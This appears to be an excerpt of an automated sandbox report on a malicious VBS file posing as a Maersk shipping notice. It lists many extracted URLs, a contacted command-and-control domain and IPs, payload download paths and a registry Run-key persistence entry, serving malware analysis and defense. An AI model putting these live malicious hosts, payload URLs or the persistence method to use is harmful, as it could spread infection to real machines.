http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	0%	Avira URL Cloud	safe
https://sumnermail.org/sumnerscools/school.php	0%	Avira URL Cloud	safe
http://139.162.	0%	Avira URL Cloud	safe
http://rghost.net/download/	0%	Avira URL Cloud	safe
http://install.outbrowse.com/logTrack.php?x	0%	Avira URL Cloud	safe
http://usa-national.info/gpu/band/grumble.dot	0%	Avira URL Cloud	safe
http://w.robints.us/cnzz.htmlwidth=0height=0	0%	Avira URL Cloud	safe
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	0%	Avira URL Cloud	safe
http://canonicalizer.ucsuri.tcs/3	0%	Avira URL Cloud	safe
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	0%	Avira URL Cloud	safe
http://spywaresoftstop.com/load.php?adv=141	0%	Avira URL Cloud	safe
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	0%	Avira URL Cloud	safe
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	0%	Avira URL Cloud	safe
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	0%	Avira URL Cloud	safe
https://sweetsizing.com/vip/	0%	Avira URL Cloud	safe
http://security-updater.com/binaries/	0%	Avira URL Cloud	safe
http://5starvideos.com/main/K5	0%	Avira URL Cloud	safe
http://77.81.225.138/carnaval2017.zip	0%	Avira URL Cloud	safe
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	0%	Avira URL Cloud	safe
https://go.wikitextbooks.info	0%	Avira URL Cloud	safe
https://bemojo.com/ds/161120.gif	0%	Avira URL Cloud	safe
http://avnpage.info/final3.php	0%	Avira URL Cloud	safe
http://esiglass.it/glassclass/glass.php	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://rotf.lol/3u6d9443	0%	Avira URL Cloud	safe
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/	0%	Avira URL Cloud	safe
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	0%	Avira URL Cloud	safe
http://www.51jetso.com/	0%	Avira URL Cloud	safe
http://www.searchmaid.com/	0%	Avira URL Cloud	safe
http://tbapi.search.ask.comxb	0%	Avira URL Cloud	safe
http://www.mva.by/tags/ariscanin1.e	0%	Avira URL Cloud	safe
http://javafx.com	0%	Avira URL Cloud	safe
http://masgiO.info/cd/cd.php?id=%s&ver=g	0%	Avira URL Cloud	safe
http://sds.clrsch.com/x	0%	Avira URL Cloud	safe
http://playsong.mediasongplayer.com/	0%	Avira URL Cloud	safe
http://tiasissi.com.br/revendedores/jquery/	0%	Avira URL Cloud	safe
http://207.154.225.82/report.json?type=mail&u=$muser&c=	0%	Avira URL Cloud	safe
http://www.xiuzhe.com/ddvan.exe	0%	Avira URL Cloud	safe
http://66.148.74.7/zu2/zc.php	0%	Avira URL Cloud	safe
http://t.zer9g.com/	0%	Avira URL Cloud	safe
http://149.3.170.235/qw-fad/	0%	Avira URL Cloud	safe
http://maringareservas.com.br/queda/index.php	0%	Avira URL Cloud	safe
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	100%	Avira URL Cloud	malware
http://82.98.235.	0%	Avira URL Cloud	safe
http://verred.net/?1309921	0%	Avira URL Cloud	safe
https://pigeonious.com/img/	0%	Avira URL Cloud	safe
http://team.afcorp.afg/chr/crt-ho_30/newjflibrary	0%	Avira URL Cloud	safe
http://data1.yoou8.com/	0%	Avira URL Cloud	safe
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	0%	Avira URL Cloud	safe
http://handjobheats.com/xgi-bin/q.php	0%	Avira URL Cloud	safe
http://www.pcpurifier.com/buynow/?	0%	Avira URL Cloud	safe
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	0%	Avira URL Cloud	safe
https://longurl.in/tllwu	0%	Avira URL Cloud	safe
https://safedental.org/wp-includes/css/report-maerskline.php	0%	Avira URL Cloud	safe
http://%63%61%39%78%2e%63%6f%6d/ken.gif	0%	Avira URL Cloud	safe
https://cdn4.buysellads.net/pub/tempmail.js?	0%	Avira URL Cloud	safe
http://memberservices.passport.net/memberservice.srf	0%	Avira URL Cloud	safe
http://www.mybrowserbar.com/cgi/coupons.cgi/	0%	Avira URL Cloud	safe
http://200.159.128.	0%	Avira URL Cloud	safe
http://www.sniperspy.com/guide.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
septnet.duckdns.org	193.104.197.90	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://110.42.4.180:	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	true	Avira URL Cloud: safe	unknown
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	true	Avira URL Cloud: safe	unknown
http://www.trotux.com/?z=	false		high
http://avnisevinc.blogspot.com/	false		high
http://200.159.128.	true	Avira URL Cloud: safe	low
http://agressor58.blogspot.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.bonusesfound.ml/update/index.php	MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.cooctdlfast.com/download.php?	MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://minetopsforums.ru/new_link3.php?site=	MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://zangomart.com/soft/order/information/adobe2/index.htm	MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://today-friday.cn/maran/sejvan/get.php	MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://Yyl.mofish.cn/interface/SeedInstall.aspx	MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://communitymanageragency.com/wp-admin/css/colors/light/report-pdf.php	MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ati.vn	MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://errors.statsmyapp.comxa	MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chambersign.org1	MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.110.217/robx/remit.jpg	MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/	MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sumnermail.org/sumnerscools/school.php	MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://139.162.	MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://rghost.net/download/	MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/	MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	false		high
http://install.outbrowse.com/logTrack.php?x	MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://usa-national.info/gpu/band/grumble.dot	MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://w.robints.us/cnzz.htmlwidth=0height=0	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bitly.com/ad	MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	false		high
http://akrilikkapak.blogspot.com/	MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	false		high
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://canonicalizer.ucsuri.tcs/3	MpSigStub.exe, 00000026.00000003.18315823751.00000138BDEF2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://actresswallpaperbollywood.blogspot.com/	MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	false		high
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://lo0oading.blogspot.com/	MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	false		high
http://www.youtube.com/watch?v=Vjp7vgj119s	MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	false		high
http://spywaresoftstop.com/load.php?adv=141	MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sweetsizing.com/vip/	MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tikotin.com	MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	false		high
http://security-updater.com/binaries/	MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://5starvideos.com/main/K5	MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://77.81.225.138/carnaval2017.zip	MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.wikitextbooks.info	MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aartemis.com/?type=sc&ts=	MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	false		high
https://tinyurl.com/up77pck	MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	false		high
https://bemojo.com/ds/161120.gif	MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mvps.org/vb	MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	false		high
http://avnpage.info/final3.php	MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://esiglass.it/glassclass/glass.php	MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://rotf.lol/3u6d9443	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aerytyre.blogspot.com/	MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	false		high
http://blogsemasacaparnab.blogspot.com/	MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	false		high
https://raw.githubusercontent.com/	MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png	MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	false		high
https://mort2021.s3-eu-west-1.amazonaws.com/image2.png	MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	false		high
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.51jetso.com/	MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kvdcmi	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false		high
http://www.searchmaid.com/	MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://remote.bittorrent.com	MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	false		high
http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs	MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	false		high
http://tbapi.search.ask.comxb	MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mva.by/tags/ariscanin1.e	MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://javafx.com	MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://masgiO.info/cd/cd.php?id=%s&ver=g	MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sds.clrsch.com/x	MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://playsong.mediasongplayer.com/	MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tiasissi.com.br/revendedores/jquery/	MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://207.154.225.82/report.json?type=mail&u=$muser&c=	MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xiuzhe.com/ddvan.exe	MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://66.148.74.7/zu2/zc.php	MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://t.zer9g.com/	MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://149.3.170.235/qw-fad/	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://maringareservas.com.br/queda/index.php	MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://82.98.235.	MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://verred.net/?1309921	MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pigeonious.com/img/	MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://team.afcorp.afg/chr/crt-ho_30/newjflibrary	MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://artishollywoodbikini.blogspot.com/	MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	false		high
http://data1.yoou8.com/	MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kthd4j	MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	false		high
http://handjobheats.com/xgi-bin/q.php	MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcpurifier.com/buynow/?	MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://longurl.in/tllwu	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://safedental.org/wp-includes/css/report-maerskline.php	MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://%63%61%39%78%2e%63%6f%6d/ken.gif	MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://logs-01.loggly.com/inputs	MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	false		high
https://cdn4.buysellads.net/pub/tempmail.js?	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://memberservices.passport.net/memberservice.srf	MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mybrowserbar.com/cgi/coupons.cgi/	MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://bdsmforyoungs.blogspot.com/	MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	false		high
http://www.sniperspy.com/guide.html	MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.104.197.90	septnet.duckdns.org	unknown		1299	TELIANETTeliaCarrierEU	true
178.32.63.50	unknown	France		16276	OVHFR	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1607
Start date:	12.10.2021
Start time:	04:37:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 18m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.mine.winVBS@21/230@1/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.19.171, 51.105.236.244, 20.82.210.154, 92.123.195.50, 92.123.195.73, 93.184.221.240, 20.82.209.183, 52.242.101.226, 104.89.38.104, 2.21.143.74, 2.21.140.235, 20.50.102.62, 52.109.8.19 Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, slscr.update.microsoft.com.akadns.net, definitionupdates.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, e3673.g.akamaiedge.net, wu.ec.azureedge.net, sls.update.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, prod.nexusrules.live.com.akadns.net, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, go.microsoft.com.edgekey.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, www.microsoft.com, nexusrules.officeapps.live.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:40:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PERAMELINE C:\Users\user\AppData\Local\Temp\FLGEBREV\COCKFIGHT.exe
04:40:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PERAMELINE C:\Users\user\AppData\Local\Temp\FLGEBREV\COCKFIGHT.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
178.32.63.50	BROCATELLE.exe	Get hash	malicious	Browse	178.32.63.50/mvbs/remvbs_IRLmSwGGFI160.bin
	Contract-No-AJ-1343CL-REFERENCE-837373HHYAAHYSBDDS3736362_OCTOBER-2021.vbs	Get hash	malicious	Browse	178.32.63.50/mvbs/remvbs_IRLmSwGGFI160.bin
	nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	178.32.63.50/moss/nancata_RbkGW109.bin
	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	178.32.63.50/moss/Host_AKhLBP62.bin
	Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exe	Get hash	malicious	Browse	178.32.63.50/mt/nansept_YbjxsPwq12.bin
	nSOA_Statement-of-Account_desk-of-account-receivable-june-august-2021-cummulative.exe	Get hash	malicious	Browse	178.32.63.50/ma/Host_wfKdFDKfLU89.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
septnet.duckdns.org	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	193.104.197.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	gFPbTs1YDm.exe	Get hash	malicious	Browse	91.121.250.249
	FYrMKmDjFi.exe	Get hash	malicious	Browse	91.121.250.249
	payment copy 20211011.exe	Get hash	malicious	Browse	51.210.156.152
	tz4Ol5gzOT	Get hash	malicious	Browse	51.83.31.49
	SAUERMANN NEW ORDER.exe	Get hash	malicious	Browse	198.50.252.64
	justificante de la transfer.exe	Get hash	malicious	Browse	54.36.109.179
	jew.x86	Get hash	malicious	Browse	54.39.101.214
	jew.arm7	Get hash	malicious	Browse	51.38.181.174
	Halkbank,doc 29092021.7.exe	Get hash	malicious	Browse	51.210.156.152
	Exodus.exe	Get hash	malicious	Browse	51.178.146.151
	1cG7fOkPjS.exe	Get hash	malicious	Browse	37.187.131.150
	test2.html	Get hash	malicious	Browse	158.69.141.29
	cerber.exe	Get hash	malicious	Browse	178.33.160.110
	SecuriteInfo.com.Trojan.MulDropNET.43.8032.exe	Get hash	malicious	Browse	51.255.34.118
	CONFIRM PROFORMA INVOICE NO 21091042 21091044.exe	Get hash	malicious	Browse	51.210.156.152
	Exodus.exe	Get hash	malicious	Browse	51.178.146.151
	1701667874-10042021.xls	Get hash	malicious	Browse	5.196.247.11
	1701667874-10042021.xls	Get hash	malicious	Browse	5.196.247.11
	FOL_JDHD98373_AMAZON_COMPROBANTE_FISCAL_DIGITAL_0398309_JDHSGGS.html	Get hash	malicious	Browse	144.217.139.163
	BROCATELLE.exe	Get hash	malicious	Browse	178.32.63.50
TELIANETTeliaCarrierEU	BROCATELLE.exe	Get hash	malicious	Browse	193.104.197.105
	Contract-No-AJ-1343CL-REFERENCE-837373HHYAAHYSBDDS3736362_OCTOBER-2021.vbs	Get hash	malicious	Browse	193.104.197.105
	e18hGJfKoy	Get hash	malicious	Browse	178.76.5.199
	zCS6X4TGYb	Get hash	malicious	Browse	193.45.0.11
	46gV91KJhQ	Get hash	malicious	Browse	213.155.129.251
	nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	193.104.197.28
	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	193.104.197.28
	0HXxUcP5S4	Get hash	malicious	Browse	217.212.229.228
	S7wQtTgZBF	Get hash	malicious	Browse	104.123.190.203
	rod3gmxCHK	Get hash	malicious	Browse	178.76.5.162
	i686	Get hash	malicious	Browse	178.76.5.180
	Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exe	Get hash	malicious	Browse	193.104.197.30
	1JFod4taFm	Get hash	malicious	Browse	193.45.0.22
	ofgE8wetW4	Get hash	malicious	Browse	213.155.150.24
	jew.x86	Get hash	malicious	Browse	80.239.196.190
	vigmCKdmz9	Get hash	malicious	Browse	178.78.11.99
	tohlIdtsnN	Get hash	malicious	Browse	62.115.122.3
	YQqx8LTbmF	Get hash	malicious	Browse	62.115.122.8
	DbGr5tUs3N	Get hash	malicious	Browse	193.45.0.10
	sora.x86	Get hash	malicious	Browse	80.239.148.228

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe	1gPmnCR2PX.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	Get hash	malicious	Browse
